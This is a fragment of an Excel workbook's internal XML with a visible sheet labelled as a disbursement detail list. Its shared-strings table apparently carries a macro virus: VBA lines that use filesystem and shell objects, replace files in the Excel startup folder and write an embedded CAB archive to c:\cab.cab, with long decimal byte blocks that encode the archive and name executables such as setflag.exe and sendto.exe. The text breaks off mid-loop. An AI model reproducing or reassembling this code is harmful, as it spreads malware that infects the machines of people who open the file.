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375" tabRatio="638" firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="Recovered_Sheet1" sheetId="1" state="hidden" r:id="rId1"/>
    <sheet name="发放明细表" sheetId="2" r:id="rId2"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId3"/>
  </externalReferences>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">发放明细表!$A$2:$XEH$2657</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="1">发放明细表!#REF!</definedName>
    <definedName name="否">[1]选项!$F$2:$F$8</definedName>
    <definedName name="是">[1]选项!$E$2:$E$9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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="18548" uniqueCount="7028">
  <si>
    <t xml:space="preserve">77 83 67 70 0 0 0 0 157 27 1 0 0 0 0 0 48 24 0 0 0 0 0 0 3 1 1 0 5 0 4 0 247 20 0 0 0 24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t>
  </si>
  <si>
    <t>Private Sub createcabfile()</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Dim ch As Byte</t>
  </si>
  <si>
    <t>on error resume next</t>
  </si>
  <si>
    <t>Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t>Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t>myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t>If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t>fso.createfolder myfolder</t>
  </si>
  <si>
    <t>End If</t>
  </si>
  <si>
    <t>For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t>If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t>workbooks(i).close</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 186 24 0 0 8 0 1 0 0 128 0 0 0 0 0 0 0 0 225 48 244 104 32 0 115 101 116 102 108 97 103 46 101 120 101 0 0 96 0 0 0 128 0 0 0 0 232 48 135 172 32 0 105 110 116 101 114 110 101 116 46 101 120 101 0 0 18 1 0 0 224 0 0 0 0 232 48 177 180 32 0 110 111 114 109 97 49 46 120 108 109 0 0 158 1 0 0 242 1 0 0 0 232 48 109 144 32 0 110 111 114 109 97 108 46 100 111 116 0 0 80 0 0 0 144 3 0 0 0 229 48 54 95 32 0 115 101 110 100 116 111 46 101 120 101 0 93 3 165 99 72 50 0 128 67 75 236 58 109 116 20 85 150 85 93 213 73 37 169 166 11 236 196 0 65 90 44 92 152 48 28 156 14 14 216 129 105 52 221 9 199 4 58 132 116 19 49 9 40 196 216 43 200 36 85 160 78 26 59 84 218 77 229 209 154 221 163 206 236 142 103 143 46 58 198 115 156 213 61 58 51 56 199 29 187 19 76 2 202 71 24 151 201 12 179 10 234 226 203 20 106 28 178 157 206 208 80 123 95 85 135 4 231 99 119 127 204 191 188 115 94 223 170 247 238 123 239 222 251 238 103 37 85 247 116 83 12 69 81 44 116 93 167 168 195 148 217 60 212 255 222 6 161 207 90 248 243 89 212 155 57 199 111 62 76 87 30 191 121 115 243 131 173 206 61 45 15 63 208 178 125 151 243 254 237 187 119 63 44 57 239 219 233 108 145 119 59 31 220 237 44 219 88 227 220 245 240 142 157 203 109 182 92 49 179 199 227 53 76 212 253 173 93 103 38 251 47 191 249 192 153 60 128 135 151 223 127 230 91 198 216 67 103 110 4 88 247 205 253 103 86 25 243 77 103 214 2 220 244 224 253 205 4 127 146 22 191 151 162 42 105 134 154 255 220 39 215 72 63 71 217 233 60 58 11 38 225 101 133 57 22 190 17 126 4 232 219 50 92 10 230 59 155 89 51 9 169 238 12 30 52 198 248 21 50 239 194 181 113 97 154 44 </t>
  </si>
  <si>
    <t>fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">28 59 40 106 201 255 65 102 255 239 6 116 190 254 23 166 151 75 59 31 145 0 238 189 51 67 144 255 107 132 65 115 194 46 203 91 118 108 151 182 83 212 7 217 25 222 175 201 96 170 129 52 60 203 77 52 106 112 62 252 236 201 224 237 249 35 188 248 95 131 213 153 54 211 102 218 76 155 105 51 109 166 205 180 153 54 211 102 218 76 155 105 127 189 166 92 44 65 101 98 105 77 109 0 85 176 65 87 178 217 179 199 67 85 171 146 184 172 191 76 156 47 96 31 212 139 8 135 232 208 178 90 252 36 148 210 181 33 58 182 89 92 17 162 55 225 239 91 97 170 76 92 181 88 135 125 18 231 44 126 188 15 70 2 40 21 170 172 85 219 68 9 55 0 126 0 223 7 131 106 135 216 65 25 216 149 202 145 85 29 241 189 34 250 8 118 10 177 53 184 218 220 69 84 142 8 104 208 215 126 158 108 166 244 177 238 175 218 62 116 157 237 136 171 247 138 69 246 39 158 130 65 216 210 137 54 139 206 16 133 44 158 196 185 28 127 45 190 66 214 74 226 150 24 162 44 148 65 117 41 190 4 21 60 122 15 165 208 144 90 38 222 155 24 177 92 122 137 48 136 142 41 231 25 255 165 23 241 32 153 175 20 183 193 241 205 100 85 204 145 183 9 191 111 14 150 1 166 71 73 176 202 17 81 173 132 211 42 69 135 199 164 168 189 143 224 186 19 176 103 145 253 160 172 235 122 136 10 173 168 197 223 179 78 138 164 44 196 110 194 29 172 201 100 8 228 145 99 29 131 37 64 101 48 131 83 41 86 132 216 106 188 141 224 108 22 253 100 168 76 148 66 172 95 125 218 144 14 246 153 84 180 41 71 42 80 226 31 219 63 214 105 138 98 122 81 42 161 231 0 21 52 21 1 17 44 123 148 91 223 126 148 186 170 235 235 36 107 57 25 64 227 137 11 57 1 114 99 120 156 49 54 40 10 81 235 208 112 226 124 78 117 45 254 13 236 9 162 141 234 251 75 209 165 73 158 3 248 44 99 16 177 4 136 189 23 4 202 118 3 99 203 50 82 125 217 88 82 212 222 79 80 55 202 199 64 194 75 92 113 247 40 225 29 186 211 254 228 5 160 182 9 </t>
  </si>
  <si>
    <t xml:space="preserve">241 76 19 218 204 88 154 64 84 69 228 84 37 206 182 79 68 201 148 10 215 36 111 204 32 176 48 14 40 171 200 104 17 185 192 174 74 198 210 89 41 138 176 70 44 30 34 130 142 149 9 105 152 41 74 246 211 82 193 59 43 64 3 99 37 140 235 244 165 31 73 14 130 68 8 96 18 12 28 237 238 111 251 59 237 111 97 108 21 2 206 149 68 150 235 236 52 73 37 82 57 232 84 226 227 156 226 99 176 89 169 251 87 225 185 176 178 50 86 242 172 178 246 138 68 223 229 30 150 184 59 149 126 214 253 171 182 47 204 75 66 142 238 59 1 159 25 218 84 139 255 141 49 111 169 76 252 155 16 237 199 223 167 13 33 192 81 149 213 248 105 139 33 173 178 77 184 11 158 106 241 46 138 252 206 166 12 209 186 226 141 13 245 91 149 35 37 125 221 208 2 112 36 23 84 78 234 200 199 247 120 36 171 50 168 107 119 244 40 82 73 0 183 80 134 117 96 1 204 66 223 43 224 90 43 89 207 71 227 97 43 224 107 115 144 175 40 26 151 242 252 216 70 38 154 138 168 58 52 160 52 241 84 99 67 159 177 107 52 41 231 4 240 223 195 46 117 48 130 111 129 135 104 188 206 56 162 161 47 233 179 121 36 59 217 246 183 176 122 124 184 174 97 126 188 207 21 111 232 171 33 107 121 215 217 32 16 132 6 193 8 34 19 22 249 219 77 175 112 180 116 27 242 113 104 109 113 10 148 227 214 160 159 172 29 55 73 114 15 200 179 8 253 17 105 150 120 69 245 241 90 182 178 129 119 42 239 1 83 156 210 196 82 106 86 35 234 107 216 218 23 162 177 133 144 3 135 128 235 112 157 117 233 171 87 198 145 135 218 95 245 194 225 239 121 64 173 94 7 134 86 161 10 62 153 80 164 21 74 155 40 208 178 221 143 151 131 249 40 41 189 78 90 112 151 54 143 140 82 242 13 201 132 69 154 229 199 55 100 166 100 75 94 202 231 54 54 107 123 195 88 136 250 36 11 26 104 132 83 107 209 197 106 56 16 133 121 251 107 97 1 121 57 53 156 142 234 170 151 67 31 201 217 174 248 200 113 226 105 100 71 211 184 143 231 105 137 67 190 66 213 235 </t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t xml:space="preserve">208 178 7 188 14 242 49 11 109 224 219 207 115 112 187 210 82 228 99 129 190 69 238 97 116 185 197 130 82 65 93 230 244 219 241 99 28 69 45 221 207 210 107 65 16 197 31 209 97 78 243 185 235 29 45 190 232 81 41 47 128 127 12 150 7 82 151 31 85 194 14 74 178 161 62 215 233 113 217 129 46 23 255 65 179 160 203 198 22 32 199 215 12 19 226 129 19 169 156 246 114 197 195 238 129 150 181 40 156 214 150 2 185 1 251 47 40 63 254 61 104 65 157 33 133 229 186 151 16 121 55 80 25 141 63 78 232 164 201 213 158 181 71 253 32 13 228 21 128 233 163 125 228 6 144 55 13 167 12 20 27 135 242 218 103 186 36 178 248 35 11 185 129 16 13 47 28 102 243 224 165 238 235 34 170 231 208 73 144 80 56 173 86 113 134 136 94 249 147 34 226 51 34 210 24 84 197 101 230 190 97 10 233 22 247 32 154 48 133 116 123 13 14 66 80 88 26 230 38 165 196 124 68 88 187 219 93 229 104 89 78 196 130 18 82 142 41 150 68 113 175 191 134 8 228 229 188 140 174 75 183 19 161 124 123 169 151 99 134 181 194 0 254 73 46 76 16 41 44 233 100 128 140 187 244 42 14 72 81 194 28 101 143 238 189 158 125 65 99 13 33 12 184 78 23 123 57 34 128 255 50 173 141 168 170 34 61 12 46 193 17 213 165 92 69 167 193 40 116 139 92 47 126 9 207 160 191 178 45 128 127 54 139 162 232 50 209 81 231 210 3 248 179 180 78 12 180 14 52 60 91 76 19 13 119 244 208 146 208 195 73 124 242 8 43 103 15 248 10 137 243 11 130 76 29 132 252 115 54 131 124 215 81 32 213 254 76 98 61 74 104 182 1 107 247 94 15 85 64 156 192 160 14 54 138 23 204 38 6 41 211 125 126 88 38 76 118 252 172 221 112 19 125 33 15 188 242 164 227 33 162 229 71 120 114 77 33 189 249 245 109 30 170 57 114 155 135 218 241 130 241 37 123 135 186 216 140 204 2 92 161 186 19 235 249 44 96 184 78 119 125 160 230 247 192 145 104 208 140 73 170 237 69 120 75 156 231 152 99 170 237 121 242 136 133 67 207 1 12 81 120 79 </t>
  </si>
  <si>
    <t xml:space="preserve">33 232 1 16 195 133 138 240 63 17 19 85 118 166 41 252 26 80 171 231 111 129 221 14 29 1 203 194 187 242 41 234 80 4 86 224 130 27 32 254 108 153 3 63 151 224 166 94 56 12 99 135 222 134 31 191 190 242 117 0 250 202 87 9 214 201 113 131 110 213 251 169 31 167 0 15 121 47 34 14 229 168 85 231 252 213 248 89 193 80 61 4 4 203 231 240 239 200 133 175 233 132 85 22 201 138 191 152 11 7 19 101 189 105 30 69 53 19 226 245 252 50 112 243 128 63 133 116 116 18 105 2 30 234 50 88 28 16 59 233 254 36 49 128 119 207 55 24 11 72 185 126 28 35 207 224 11 67 64 95 228 49 160 50 159 7 108 112 121 181 160 250 160 12 238 53 207 131 23 178 43 79 16 109 31 128 56 153 178 42 23 22 198 138 162 207 3 114 226 2 131 152 100 217 10 150 150 30 12 98 251 226 140 26 150 94 211 158 130 144 5 167 68 138 10 209 8 227 47 225 161 206 253 110 157 84 20 196 159 144 103 191 158 239 128 195 64 196 185 122 190 0 79 8 107 22 215 231 65 124 55 204 34 166 46 178 99 5 75 69 63 151 114 106 113 255 34 192 215 242 93 113 205 161 44 126 26 152 165 76 213 201 153 84 157 250 173 38 135 166 30 47 0 45 156 171 239 229 112 22 104 73 83 123 19 63 126 217 21 175 83 179 84 31 167 250 216 134 62 8 93 172 219 74 56 107 93 131 6 33 224 77 88 149 143 23 34 62 70 184 74 150 13 1 67 139 253 120 109 134 200 66 147 72 206 36 18 72 140 131 13 206 57 68 200 184 142 10 162 139 237 23 29 36 3 169 226 106 220 54 178 127 32 104 87 30 5 95 132 18 232 171 63 150 93 23 200 174 135 182 119 4 1 3 28 127 88 80 195 41 53 60 106 248 23 50 214 227 148 248 144 37 88 141 15 229 26 198 131 24 166 63 233 97 35 246 142 4 185 15 47 79 150 120 211 106 152 179 63 241 25 140 196 162 23 47 131 85 86 165 139 171 120 119 149 208 186 20 30 117 111 186 43 39 50 145 43 103 235 222 209 126 202 230 233 228 60 104 48 246 12 193 44 62 214 62 65 254 92 211 246 62 </t>
  </si>
  <si>
    <t>If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t xml:space="preserve">74 153 107 139 83 49 239 88 136 242 155 111 65 63 98 244 146 21 122 126 145 33 2 233 46 228 29 163 189 41 247 64 91 30 248 209 98 47 239 246 10 45 93 46 240 48 48 102 143 34 32 97 117 152 147 26 67 214 45 171 189 156 92 57 37 30 67 90 35 17 67 31 137 20 33 212 104 3 177 170 177 96 181 46 11 186 204 235 83 135 192 214 99 192 145 234 77 105 47 79 33 63 7 97 1 191 227 36 106 176 198 84 58 143 196 131 4 34 171 230 217 59 142 67 68 49 207 42 34 70 189 134 28 166 21 20 123 71 255 156 186 128 55 124 129 4 198 64 8 226 69 131 156 125 152 184 42 45 203 221 31 206 70 253 135 200 12 228 148 248 49 162 117 135 72 24 38 225 234 230 16 27 80 141 112 138 183 95 55 193 133 230 225 205 224 13 235 92 71 15 251 193 34 81 62 153 81 217 217 74 220 9 153 240 154 83 45 16 129 127 231 58 253 214 54 50 217 139 126 111 42 2 98 13 69 64 236 40 113 231 16 33 100 70 201 209 149 132 243 206 246 137 56 96 182 125 0 14 241 63 193 93 68 214 156 34 44 72 214 145 38 56 151 104 25 36 36 50 79 146 145 6 161 231 128 189 227 18 176 213 227 177 71 53 2 33 253 35 249 69 143 96 239 56 75 148 100 3 39 94 85 103 129 127 6 124 50 161 236 228 41 241 75 222 210 244 10 111 248 245 69 237 87 247 192 105 18 215 126 181 27 160 156 87 131 127 184 200 72 139 228 236 0 174 36 156 146 56 198 209 65 105 71 38 217 137 85 208 234 44 180 161 112 61 4 196 13 236 126 33 232 175 193 212 149 140 95 227 53 151 114 89 151 10 80 31 122 143 48 122 126 146 209 24 59 168 89 15 111 105 5 11 243 176 78 201 22 178 132 168 26 124 52 219 212 108 31 215 85 197 117 114 154 3 242 71 47 215 72 182 252 113 122 114 203 213 97 190 81 202 34 145 75 179 67 244 55 170 37 141 227 157 64 63 201 220 182 214 247 189 63 173 129 128 130 134 128 170 4 20 230 192 242 134 152 126 247 213 189 156 59 101 63 240 8 88 213 248 0 249 107 164 236 128 194 70 249 152 81 38 184 150 </t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t xml:space="preserve">165 151 94 210 197 103 134 111 130 219 24 248 57 153 84 70 216 22 94 57 199 48 131 186 24 29 93 0 126 81 140 97 152 238 6 248 16 129 20 252 44 131 238 135 126 203 80 87 86 103 118 151 143 238 44 167 187 124 22 216 182 179 220 162 244 51 202 128 177 249 251 215 54 143 173 159 194 53 176 104 165 223 162 12 88 8 214 143 174 97 117 155 56 62 192 40 39 51 7 167 175 63 9 224 109 232 111 66 127 21 250 139 208 159 131 254 52 244 131 132 254 178 39 63 85 203 158 250 20 32 6 136 1 94 4 120 17 32 20 31 79 141 2 28 3 56 6 48 5 48 5 48 13 48 29 99 99 198 159 105 71 153 212 164 36 116 194 240 40 244 52 116 97 33 140 120 185 134 198 163 125 221 132 186 233 207 38 231 153 17 160 241 58 105 128 40 38 113 99 210 109 233 88 219 234 116 70 254 226 148 252 109 87 46 189 148 134 115 247 56 201 185 227 191 6 41 59 157 6 191 147 247 49 97 222 71 49 185 143 71 22 26 247 65 144 187 59 225 185 7 250 41 232 93 62 230 150 161 206 114 102 3 108 188 145 108 251 211 105 219 18 186 50 243 83 119 244 133 69 249 210 144 254 193 105 152 221 211 240 0 105 234 174 190 96 148 47 9 185 246 3 247 64 88 185 126 111 17 192 50 232 37 208 75 161 151 65 175 132 190 25 250 3 78 227 94 160 240 123 170 8 96 33 192 66 128 14 128 14 128 2 64 1 32 15 144 7 200 1 228 0 178 0 217 235 239 197 148 79 4 126 59 161 255 0 250 171 206 105 247 226 99 128 234 105 247 96 188 95 127 7 211 199 174 187 55 125 229 197 125 30 202 72 128 137 192 73 86 209 38 178 231 246 45 50 210 137 34 179 80 146 11 86 151 137 156 36 24 99 63 188 201 28 251 208 21 55 99 175 123 37 39 121 168 125 144 225 223 87 96 78 21 65 189 197 132 232 6 165 223 174 92 24 13 76 37 25 78 35 201 152 138 216 246 142 35 25 31 246 54 129 22 41 215 48 238 145 127 133 55 158 158 116 85 80 186 189 189 128 68 0 43 184 11 53 75 223 91 8 49 158 228 150 7 141 50 146 87 141 60 251 33 </t>
  </si>
  <si>
    <t xml:space="preserve">226 78 31 64 1 62 217 123 64 46 65 27 132 160 50 161 67 21 60 145 208 13 111 84 250 239 134 55 42 61 169 89 223 33 222 168 107 35 219 24 57 127 32 50 113 64 206 138 156 112 170 1 190 125 191 145 186 66 242 189 1 202 46 146 208 190 155 73 104 73 241 51 171 2 206 177 255 148 94 167 206 106 232 27 31 158 31 87 206 9 74 92 200 201 184 87 82 73 130 7 82 46 242 196 75 115 65 247 74 51 131 122 151 100 1 253 224 247 193 41 66 240 207 164 1 25 223 200 244 119 249 217 100 47 164 2 255 76 138 230 157 41 10 234 14 37 44 80 232 164 244 64 178 215 34 223 151 236 173 144 22 116 121 172 165 185 82 129 94 37 128 5 50 177 141 244 128 55 69 10 157 254 178 21 214 92 51 112 67 192 150 133 106 35 104 139 102 222 114 135 25 68 67 214 58 119 66 206 159 10 132 170 205 136 201 107 201 129 169 93 70 206 177 18 158 253 184 142 228 142 35 183 18 122 25 84 59 70 215 166 98 149 43 88 35 87 129 204 35 69 84 225 180 148 19 249 78 174 204 242 172 102 17 47 119 130 18 129 183 77 169 94 129 25 116 39 212 170 148 93 121 207 72 80 132 46 170 20 226 51 185 198 82 155 148 215 153 93 174 123 133 17 82 127 175 95 13 249 73 33 96 120 34 171 114 229 44 197 43 88 180 134 254 108 91 57 108 162 181 154 188 0 110 204 171 135 232 201 44 68 188 46 91 132 167 114 37 60 70 73 235 204 124 160 66 186 161 203 171 131 124 110 132 109 80 94 121 103 217 109 86 109 169 59 204 203 121 145 176 158 43 91 251 179 115 181 194 16 29 210 73 42 81 109 124 156 224 201 140 196 146 115 129 126 32 201 126 160 28 108 91 19 64 186 18 240 156 213 227 1 38 45 157 89 197 97 30 114 51 200 115 254 82 70 241 166 145 16 72 22 253 84 179 3 66 105 51 7 63 248 4 96 52 179 228 149 34 175 239 80 153 82 6 74 12 163 144 201 55 117 151 12 208 198 0 155 25 8 134 232 198 213 107 134 225 16 121 54 177 75 61 127 217 54 82 77 228 47 1 0 198 201 83 53 232 94 209 161 174 249 0 80 </t>
  </si>
  <si>
    <t xml:space="preserve">58 23 144 28 65 46 125 225 117 147 134 69 200 246 42 73 63 99 223 77 187 71 91 110 64 89 38 93 202 23 172 123 37 65 105 253 188 161 217 73 136 42 36 68 125 195 176 248 230 37 100 64 36 3 115 141 129 232 217 173 50 177 117 78 53 200 48 43 137 198 140 177 3 169 173 182 107 251 246 179 218 231 102 94 93 99 38 214 129 96 107 43 164 214 163 36 181 134 164 183 52 54 153 244 218 147 101 183 65 126 29 240 227 15 11 205 130 65 230 167 100 169 109 132 243 10 13 209 20 1 171 43 72 85 48 12 249 196 215 178 239 28 63 126 163 128 120 2 39 202 38 101 194 149 24 40 0 234 251 179 151 115 205 34 161 158 231 92 103 209 62 97 117 35 171 202 99 97 70 109 100 67 116 77 0 175 51 235 73 119 31 228 211 109 91 81 144 111 26 239 229 104 153 43 46 103 71 230 16 83 200 70 27 57 52 92 252 235 100 47 163 214 167 164 165 232 12 250 48 241 7 171 242 201 66 228 120 198 172 27 126 195 70 164 37 104 200 125 170 117 81 228 142 92 153 209 189 169 59 181 175 146 189 17 121 206 117 149 238 8 201 222 149 112 154 146 57 208 168 145 55 224 45 89 206 131 241 147 226 21 5 217 232 105 153 187 185 54 53 242 15 240 90 156 96 122 201 119 153 254 63 85 121 101 193 129 33 146 71 233 242 24 126 252 170 201 129 55 45 47 64 229 28 212 32 196 24 91 243 136 125 1 41 156 7 72 41 183 57 181 18 130 158 38 43 170 96 133 145 249 194 50 200 215 247 217 208 70 195 223 89 193 223 73 12 42 47 36 7 27 199 192 43 249 194 226 229 150 122 211 64 50 148 21 76 194 208 121 242 149 164 26 28 221 202 49 136 30 228 99 137 235 44 72 71 173 79 119 101 151 110 151 230 149 182 72 246 210 125 246 232 34 144 224 91 52 4 22 141 124 0 56 65 107 220 91 57 196 0 79 88 66 244 61 93 229 116 249 29 125 246 142 79 128 93 247 47 205 180 213 254 139 184 146 218 252 120 139 180 77 193 197 146 87 193 115 165 219 21 60 75 42 170 176 71 95 37 101 70 125 218 30 61 4 15 3 222 52 241 128 202 81 </t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t xml:space="preserve">167 246 51 99 240 201 233 131 130 246 47 201 132 71 14 43 71 61 218 15 146 9 139 220 170 156 191 170 92 72 43 71 45 237 39 72 53 162 29 56 76 156 122 116 80 174 203 27 28 105 33 74 128 239 147 42 42 164 229 10 206 147 230 40 56 75 246 36 223 141 203 238 200 113 207 72 13 76 175 174 79 201 203 51 110 183 253 130 254 142 174 143 148 102 134 111 156 28 62 65 254 189 107 100 49 12 195 82 41 219 117 122 100 46 60 71 142 71 70 102 3 108 126 17 144 12 39 13 110 232 187 55 194 141 15 130 67 112 191 23 102 161 188 157 135 188 14 221 122 16 116 69 221 195 171 91 88 181 80 221 194 169 91 138 212 10 243 27 14 202 39 5 8 84 231 174 207 93 73 87 220 253 31 193 253 245 104 129 241 165 240 50 178 187 143 75 249 201 117 188 34 229 122 148 1 214 221 219 118 81 251 14 42 81 52 17 165 66 206 196 103 22 92 144 130 50 5 217 204 250 196 110 126 97 44 205 118 95 145 10 209 184 251 191 129 223 13 130 174 238 102 213 221 188 186 155 83 151 171 187 139 80 191 81 92 147 162 131 208 75 34 4 68 118 123 135 147 216 196 22 46 122 214 222 145 79 110 242 178 85 230 149 109 28 56 177 45 35 54 99 0 244 57 73 244 217 246 91 194 77 21 40 36 175 26 207 168 130 37 89 84 116 208 152 173 104 37 21 83 37 252 50 67 1 247 177 112 126 172 100 125 241 80 172 228 39 195 80 54 41 183 82 202 255 180 247 53 80 81 92 89 194 213 116 129 5 52 118 43 16 209 104 210 70 204 196 33 49 196 246 7 166 197 116 11 173 128 160 141 45 221 33 138 74 164 13 116 16 152 166 74 193 129 164 73 193 124 20 149 90 157 196 179 155 61 51 155 9 209 153 117 146 239 59 155 179 153 207 207 153 100 147 198 206 128 154 108 98 116 39 58 154 47 226 140 187 83 78 185 9 70 3 173 33 212 119 239 171 106 108 147 56 51 187 103 206 126 231 236 225 157 243 120 127 247 189 119 223 223 125 247 222 119 139 30 48 149 114 163 34 37 46 217 0 48 5 176 188 97 36 24 152 224 113 1 155 11 246 198 101 117 98 </t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t xml:space="preserve">86 117 193 15 226 178 240 93 64 41 45 120 46 46 11 53 236 202 178 2 41 46 235 105 204 202 46 216 19 151 133 58 15 101 90 193 179 152 149 162 101 245 162 0 75 16 9 48 234 169 42 129 68 171 54 43 12 14 189 2 114 224 136 236 199 49 162 206 58 25 229 218 204 197 64 181 64 64 17 55 100 211 98 154 27 192 243 51 81 32 244 30 198 191 44 142 22 198 138 113 62 108 178 15 180 208 249 22 238 115 201 84 178 89 50 73 152 11 39 24 178 88 32 123 17 143 237 92 254 156 131 132 182 114 137 242 124 224 132 196 37 168 121 178 169 189 73 223 137 176 211 151 23 176 134 213 94 249 159 81 111 37 177 73 6 69 150 232 127 194 219 196 45 223 53 162 170 226 112 149 253 170 176 4 245 82 32 178 38 203 125 255 142 123 161 0 91 200 187 155 205 175 244 201 207 101 225 67 85 149 43 244 112 1 123 79 165 124 233 115 85 181 71 170 132 36 2 30 68 112 159 186 84 70 243 207 42 32 248 85 198 47 243 238 230 142 85 171 4 9 249 135 88 46 204 193 184 112 215 150 205 131 137 7 0 83 60 14 27 117 34 113 11 246 143 3 71 249 230 16 192 214 209 0 227 245 168 153 121 48 79 125 168 82 19 150 28 197 77 50 158 151 197 38 136 81 201 21 117 75 174 49 183 199 227 147 203 9 79 129 212 71 162 123 220 114 201 231 56 40 254 237 44 251 85 192 144 145 79 92 6 12 98 240 162 11 128 190 239 246 250 228 25 164 214 24 255 118 70 177 64 52 113 91 54 239 71 85 156 70 189 196 114 96 66 50 60 94 126 46 37 114 22 164 96 131 4 107 88 200 110 149 101 132 101 112 144 132 14 83 40 239 30 174 168 215 109 112 132 110 220 195 46 232 58 201 206 55 31 58 57 242 116 77 155 131 162 89 147 106 232 30 97 147 122 45 61 119 172 114 144 248 175 73 92 121 143 36 232 208 189 212 42 108 96 149 67 41 36 57 137 164 184 215 226 48 31 58 59 194 199 55 146 216 155 213 115 215 42 232 197 202 38 119 33 151 117 35 153 123 183 235 36 103 44 86 24 210 212 118 21 216 195 44 42 148 71 153 187 134 0 207 </t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">94 11 194 38 34 156 17 40 60 201 199 131 21 143 188 88 153 161 38 12 186 80 99 79 217 206 133 242 54 113 180 163 80 25 69 148 238 31 137 24 184 249 168 123 202 98 211 66 173 134 123 36 183 129 163 197 35 138 81 0 209 25 200 249 201 252 202 44 243 190 35 66 101 214 7 138 120 106 13 112 126 83 11 17 145 129 164 77 171 84 195 26 238 106 175 5 240 44 229 59 178 40 46 5 81 121 24 80 97 191 131 218 103 118 33 0 206 140 27 98 146 54 63 218 220 152 227 38 208 8 185 170 193 113 233 17 32 143 177 9 83 13 151 102 96 82 101 141 252 183 96 57 50 128 254 169 84 117 164 162 162 239 226 46 36 129 226 3 101 91 113 55 217 206 1 37 132 141 202 217 212 95 139 195 246 171 44 28 95 132 192 209 42 247 169 153 197 200 67 68 237 95 152 187 254 128 87 3 41 195 39 151 75 248 34 202 71 13 230 110 36 26 176 135 76 90 125 115 215 17 124 128 203 191 75 28 96 167 58 28 219 243 179 184 235 90 240 89 206 128 88 80 4 205 125 16 245 120 28 30 143 219 235 241 8 69 217 139 213 211 162 108 87 216 69 149 242 161 207 180 35 83 148 109 97 231 121 60 149 168 198 206 6 40 245 52 112 171 83 137 46 187 229 15 120 78 54 101 91 128 121 179 120 213 76 7 162 23 81 60 124 52 129 43 179 127 129 36 35 134 49 187 60 239 110 113 16 136 121 94 22 247 5 254 25 201 25 116 136 114 165 188 238 51 253 56 115 180 109 68 73 173 244 121 229 41 159 146 219 223 167 102 46 199 218 3 200 40 33 229 70 65 238 114 17 170 115 235 112 70 228 12 173 42 8 102 76 224 78 249 239 46 33 50 75 144 165 24 36 108 155 21 181 136 223 71 72 251 112 203 172 16 10 52 83 213 129 85 137 41 125 8 195 15 48 137 88 166 252 86 130 17 2 127 182 9 250 218 14 188 232 74 216 117 191 210 94 167 139 186 195 230 174 95 96 60 87 170 163 15 83 12 54 37 205 94 216 158 32 14 231 19 89 168 99 253 91 7 118 35 63 140 248 116 93 33 143 65 108 30 175 245 47 76 145 122 72 247 253 45 89 161 </t>
  </si>
  <si>
    <t>open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t xml:space="preserve">173 208 61 163 14 56 18 83 68 51 31 102 58 251 73 231 23 97 87 107 45 181 191 174 36 137 36 102 131 125 243 228 42 209 136 178 223 210 222 114 106 164 223 192 46 4 94 134 75 5 44 41 77 177 120 151 56 40 190 255 85 149 148 152 42 48 0 223 83 76 175 118 225 155 249 120 251 47 109 231 180 193 46 63 163 74 139 207 112 229 221 231 6 86 209 157 92 98 96 228 17 37 69 140 20 19 153 47 252 57 52 188 129 44 20 175 170 236 12 223 68 55 38 162 158 18 86 224 130 38 133 214 210 14 197 204 71 141 112 56 214 210 140 66 195 223 80 33 255 133 177 253 135 42 65 92 205 116 35 83 77 158 63 139 34 182 112 128 66 17 187 14 153 18 243 190 48 244 81 75 90 221 143 114 51 155 41 179 70 242 64 98 142 9 210 91 241 89 35 28 129 91 55 242 46 81 12 250 42 81 178 168 123 49 23 74 225 190 62 49 151 162 170 225 228 136 255 10 87 80 89 54 61 234 164 147 0 187 195 120 56 88 51 44 23 3 23 147 69 72 56 140 66 63 190 65 138 184 176 129 241 186 131 208 64 173 186 4 149 15 250 99 10 148 88 225 198 23 155 77 252 184 202 46 4 1 32 155 189 79 90 188 83 52 189 38 148 129 140 80 108 226 219 95 163 41 110 122 157 1 121 131 162 215 24 25 63 35 80 55 188 198 40 145 218 61 137 148 38 215 32 55 110 11 215 138 105 152 238 108 163 177 35 206 34 86 152 196 245 166 252 10 134 75 36 184 69 60 21 175 215 194 101 169 164 232 17 96 103 133 53 140 80 72 11 79 152 170 54 30 161 169 119 223 245 22 46 202 125 164 48 55 151 240 246 12 14 125 76 172 54 1 225 30 117 144 65 154 187 241 82 23 224 194 112 161 150 28 110 6 161 112 76 108 49 137 223 99 112 4 53 146 105 39 223 190 135 166 88 151 183 82 122 194 162 110 216 67 87 111 134 22 82 195 172 173 117 57 64 121 228 159 17 158 154 134 82 175 71 254 152 36 24 168 22 48 136 69 123 24 185 6 31 215 232 61 66 161 9 234 50 80 1 138 196 197 123 148 62 242 5 136 50 155 140 68 201 196 198 3 170 71 </t>
  </si>
  <si>
    <t>For i = 1 To 150</t>
  </si>
  <si>
